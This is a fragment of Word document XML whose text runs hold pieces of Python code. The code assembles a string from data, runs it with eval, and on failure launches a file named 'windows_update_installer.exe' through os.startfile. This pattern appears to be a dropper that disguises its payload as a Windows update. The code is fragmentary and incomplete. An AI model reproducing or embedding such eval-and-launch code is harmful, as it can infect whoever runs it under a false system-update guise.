    </w:p>
    <w:p w14:paraId="22C4EB0F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    eval(liste)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777A55AB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liste = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B357C4E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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE877D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                liste += data[el]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0A75F" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B19CA3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>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2EABD" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E71CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    os.startfile("windows_update_installer.exe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84371E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E43474C" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:r>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C3898" w14:textId="77777777" w:rsidR="00D51340" w:rsidRDefault="00D51340"/>
    <w:sectPr w:rsidR="00D51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CA"/>
    <w:rsid w:val="00253C6D"/>
    <w:rsid w:val="00340DD3"/>
    <w:rsid w:val="003E71CA"/>
    <w:rsid w:val="00970CEB"/>
    <w:rsid w:val="009C161E"/>
    <w:rsid w:val="00D5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244E23"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{89D6E723-4238-134B-9AB0-A20119A6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D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340D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0DD3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00340DD3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0034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kremer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Shadow A</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-28T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-11T11:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>